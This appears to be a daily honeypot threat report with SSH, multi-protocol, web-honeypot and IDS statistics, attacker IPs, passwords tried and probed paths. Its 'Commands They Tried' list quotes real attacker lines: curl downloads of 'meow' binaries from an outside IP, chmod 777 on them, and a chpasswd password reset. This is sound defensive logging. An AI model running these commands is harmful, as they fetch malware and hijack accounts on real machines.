Monday, 1 June 2026 πŸ’€ critical

Daily Threat Report

312 SSH Connections
248 Login Attempts
76 Commands Run
67 SSH Unique IPs
9,031 Protocol Events
24 Protocol IPs
87 Web Hits
30 Web Service IPs

Top Attacker IPs

  1. 🌐 87.251.64.176 BGPβ†—
  2. 🌐 185.246.128.133 BGPβ†—
  3. 🌐 94.154.35.215 BGPβ†—
  4. 🌐 179.43.133.154 BGPβ†—
  5. 🌐 139.19.117.129 BGPβ†—

Top Passwords Tried

  1. 0
  2. admin
  3. 123456
  4. Q1w2e3r4
  5. \xef\xbb\xbf------fuck------

🌐 WEB HONEYPOT β€” HoneyAI HTTP

AI-generated fake HTTP responses served to 87 scanner requests from 30 unique IPs (local, offline).

Top Paths Probed

  1. /SDK/webLanguage
  2. /
  3. /favicon.ico
  4. /zc?action=getInfo
  5. hlwicpfwc.miit.gov.cn:443

Top User-Agents

  1. Mozilla/5.0 (Windows NT 10.0
  2. Win64
  3. x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46
  4. Mozilla/5.0 (compatible
  5. Infrawatch/1.0
  6. +https://infrawat.ch/)
  7. Hello World/1.0
  8. Mozilla/5.0 zgrab/0.x
# Automatic multi-platform threat intel reporting
$ honeypot-report.sh --since 24h
β†’ 17 IPs β†’ AbuseIPDB  (community confidence scores updated)
β†’ 17 IPs β†’ AlienVault OTX  (pulse indicators added)
β†’ 17 IPs β†’ Blocklist.de  (auto-ban list updated)
β†’ 17 IPs β†’ DShield/SANS  (global threat feed updated)

🀣 ATTACKER COMEDY CORNER

Real attempts. No actors were harmed in the making of this honeypot.

πŸ”‘ Hall of Shame β€” Passwords

admin
Q1w2e3r4
\xef\xbb\xbf------fuck------
razors
rangers9

πŸ’» Commands They Tried

chmod 777 meow
chmod 777 meowarm64
curl -O http://34.181.210.37/meow
curl -O http://34.181.210.37/meowarm64
echo $(whoami):modzmodz | chpasswd

These are real credentials and commands attempted by automated scanners and script kiddies. Logged, reported, and immortalized.

Automated report for 1 de June de 2026. Recorded 312 SSH connections on the Cowrie honeypot and 9031 multi-protocol events on OpenCanary, from 91 unique IPs. 17 IPs were automatically reported to the AbuseIPDB community database.

SSH Activity (Cowrie)

The SSH honeypot received 248 login attempts from 67 unique IPs. Attackers executed 76 commands after gaining simulated system access.

Multi-Protocol Activity (OpenCanary)

Detected 9031 events across services including FTP, Telnet, MySQL, Redis, VNC and Git from 24 distinct IPs. All events are access attempts against simulated production services.

HTTP Web Honeypot (Galah LLM)

The web honeypot received 87 HTTP requests from real scanners across 30 unique IPs. Each attacker received a fake response generated in real time by the local AI model qwen2.5:0.5b (Ollama, no internet connection required).

Network IDS (Suricata)

The network intrusion detection system generated 18948 alerts from 675 unique source IPs. Suricata monitors all traffic on the primary network interface using Emerging Threats + AlienVault OTX rulesets.

← All Reports πŸ›‘οΈ Subscribe to blocklists β†’